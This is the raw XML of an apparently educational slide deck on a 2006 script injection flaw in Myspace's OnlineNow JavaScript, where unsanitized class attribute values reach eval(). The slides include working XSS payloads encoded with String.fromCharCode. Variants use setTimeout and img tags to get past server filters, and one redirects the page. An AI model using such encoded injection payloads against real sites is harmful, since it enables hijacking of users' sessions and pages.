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75-87A2-49CC-A823-596CCACBA4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A6D2-B641-4052-8C3C-7DC927FD1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75-87A2-49CC-A823-596CCACBA4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A6D2-B641-4052-8C3C-7DC927FD1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75-87A2-49CC-A823-596CCACBA4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A6D2-B641-4052-8C3C-7DC927FD1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75-87A2-49CC-A823-596CCACBA4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A6D2-B641-4052-8C3C-7DC927FD1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75-87A2-49CC-A823-596CCACBA4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A6D2-B641-4052-8C3C-7DC927FD1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75-87A2-49CC-A823-596CCACBA4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A6D2-B641-4052-8C3C-7DC927FD1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75-87A2-49CC-A823-596CCACBA4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A6D2-B641-4052-8C3C-7DC927FD1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75-87A2-49CC-A823-596CCACBA4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A6D2-B641-4052-8C3C-7DC927FD1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75-87A2-49CC-A823-596CCACBA4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A6D2-B641-4052-8C3C-7DC927FD1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75-87A2-49CC-A823-596CCACBA4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A6D2-B641-4052-8C3C-7DC927FD1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B275-87A2-49CC-A823-596CCACBA4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A6D2-B641-4052-8C3C-7DC927FD1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B275-87A2-49CC-A823-596CCACBA46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A6D2-B641-4052-8C3C-7DC927FD1E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Myspace.com - Intricate Script Injection Vulnerability (2006)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Injection Vulnerabilities are often patched by server side filters which blocks certain key words (&lt;script&gt; for example)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This was not a case of bad server side filter – it was a problem with the client side java script libraries being used</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This problem needed a fix in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> libraries and not in filtering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Myspace.com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 every page of Myspace.com there were embedded scripts that define functions and objects necessary to dynamically provide online/offline status of user on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>myspace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Within the provided HTML there are specific </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;div&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>tags that are to be handled by the functions. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>They are typically placed underneath the picture of the "friend" and passes the specific </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>friendID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> friend to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>OnlineNow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> functions.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&lt;div style= “width:80px; height:20px;” id= “userDataNode0” class = “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DataPoint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OnlineNow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17601323;”&gt; &lt;/div&gt;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OnlineNow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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ID of these tags follows the format of '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>UserDataNodeN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>' - where the value of N increases in sequential order from 0 to (the number of tags - 1).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>At the end of the HTML the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>OnlineNow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> mechanism is called </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>which finds all the tags, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>parses out all the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>UserIDs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> specified in the class property </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>passes them to an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>which calls on a web-application that returns a true/false value specifying whether that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>FriendID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> is found to be "online now".</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> Finds all </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>friendIDs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> that were found to be online and set the DIV tag's </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>innerHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> to display an image that shows the user is online within the browser display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OnlineNow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 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script injection vulnerability within this mechanism specifically found during the searching and parsing of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;div&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>tags.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>function in which the vulnerability is located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OnlineNowNodeParser_locateNodes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found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OnlineNowNodeParser.js.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of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3100" dirty="0" err="1" smtClean="0"/>
              <a:t>OnlineNowNodeParser_locateNodes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3100" dirty="0" smtClean="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="31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3000" y="1676400"/>
          <a:ext cx="6459794" cy="4635500"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <p:oleObj spid="_x0000_s1026" name="Wordpad Document" r:id="rId3" imgW="5486400" imgH="3936960" progId="WordPad.Document.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function initiates a loop starting from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> = 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>checks for the existence of an element with an ID with the format "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>UserDataNode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>" + I</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>It then splits the semicolon delimited class property and extracts a Name and Value combination from the format Name=Value </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>class="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>DataPoint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>OnlineNow;UserID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>=17601323;“ creates two Name and Value variable combinations </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Datapoint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>OnlineNow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>UserID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> &amp; 17601323</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>These variables are then passed to an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>() function </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>which creates the property of the object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>this.NodeArray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].Name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There is no sanitization of the variables 'Name' and 'Value' passed to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>() function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String.fromCharCode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(118,97,114,32,119,61,51,59,97,108,101,114,116,40,119,41,59) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>returns the string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w=3;alert(w)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>;“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Payload: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 id="UserDataNode0" class='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=17601323"+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String.fromCharCode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(118,97,114,32,119,61,51,59,97,108,101,114,116,40,119,41,59))+";'&gt;&lt;/div&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The string generated by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>fromCharCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(); can be any script the exploiter specifies.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iltering on Server Side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the server filters ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>’ then use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>setTimeout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&lt;div id="UserDataNode0" class='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>UserID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=17601323"+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>setTimeout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>String.fromCharCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(100,111,99,117,109,101,110,116,46,108,111,99,97,116,105,111,110,61,34,104,116,116,112,58,47,47,119,119,119,46,103,111,111,103,108,101,46,99,111,109,34,59),0)+";'&gt;&lt;/div&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If the server filters div tag, use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> tag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id="UserDataNode0" class='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>UserID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=17601323"+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>setTimeout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>String.fromCharCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(100,111,99,117,109,101,110,116,46,108,111,99,97,116,105,111,110,61,34,104,116,116,112,58,47,47,119,119,119,46,103,111,111,103,108,101,46,99,111,109,34,59),0)+";' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>="blah.jpg"&gt;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515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Wordpad Document</vt:lpstr>
      <vt:lpstr>Slide 1</vt:lpstr>
      <vt:lpstr>Myspace.com - Intricate Script Injection Vulnerability (2006)</vt:lpstr>
      <vt:lpstr>Myspace.com feature</vt:lpstr>
      <vt:lpstr>OnlineNow Mechanism</vt:lpstr>
      <vt:lpstr>OnlineNow Vulnerability</vt:lpstr>
      <vt:lpstr>Code of OnlineNowNodeParser_locateNodes()</vt:lpstr>
      <vt:lpstr>Explanation of the function</vt:lpstr>
      <vt:lpstr>Exploits</vt:lpstr>
      <vt:lpstr>Filtering on Server Side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cse</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-02-29T12:26:17Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-02-29T12:52:39Z</dcterms:modified>
</cp:coreProperties>
</file>